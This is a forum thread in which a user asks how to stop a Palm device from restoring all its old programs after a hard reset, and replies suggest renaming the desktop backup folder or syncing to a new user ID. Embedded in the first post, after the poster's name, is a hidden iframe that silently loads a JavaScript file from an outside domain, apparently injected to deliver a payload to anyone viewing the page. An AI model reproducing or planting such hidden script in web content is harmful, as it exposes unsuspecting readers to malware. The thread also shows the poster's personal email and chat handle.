+ Reply to Thread

Hard reset

Had to do my first hard reset today. Not sure why, but whenever I went from the phone side to the palm side I would crash.

I figured...no problem. I can just do a hard reset and re-install the programs one by one to see what the problem might be, BUT when I resync after the hard reset, I get all my programs back.

I'm sure this is a basic palm funtion, but since I never did a hard reset on my Palm III or my 6035, I am clueless how to STOP the programs from reinstalling again on resync.

How do I start from scratch again????

Thanks in advance for the help.

Jeff<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

If you really, really want to start from scratch and do not want to even save your phone book, calendar, etc. data, you can uninstall the Palm desktop. Assuming your using Windows, after using the uninstaller, you have go to the Palm folder and manually delete ithe whole folder, since the uninstaller leaves the backup folder. Then reboot and reinstall the Palm Desktop, and resync the Palm after a hard reset.

Assuming you want to save your calendar, phone book, etc., then I *believe* you can move or rename the backup file in the Palm folder under Windows. This should prevent it from reinstalling the old apps and force it to create a new backup folder.

got it!

I renamed the back up folder...and then did the resync. Saved all my addresses and stuff, but did not install any of the programs.

I will now install them all manually. I had too much junk on the phone anyway. Toooooo many demo this/trial that.

Feels kinda good to start from scratch.

Thanks for the help.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Originally posted by lnoble
    If you really, really want to start from scratch and do not want to even save your phone book, calendar, etc. data, you can uninstall the Palm desktop. Assuming your using Windows, after using the uninstaller, you have go to the Palm folder and manually delete ithe whole folder, since the uninstaller leaves the backup folder. Then reboot and reinstall the Palm Desktop, and resync the Palm after a hard reset.

Assuming you want to save your calendar, phone book, etc., then I *believe* you can move or rename the backup file in the Palm folder under Windows. This should prevent it from reinstalling the old apps and force it to create a new backup folder.
    There's another way to do this and keep the old data: Go into Palm Desktop and create a new user. Export the addresses, calendar, and any typical data from the old ID, and import it all into the new ID. Do a hard reset, sync, and when prompted, choose the new ID.

This gives the ability to go back to the old data if the new sync doesn't cooperate, or simply look up info under the old ID (for whatever the reason)...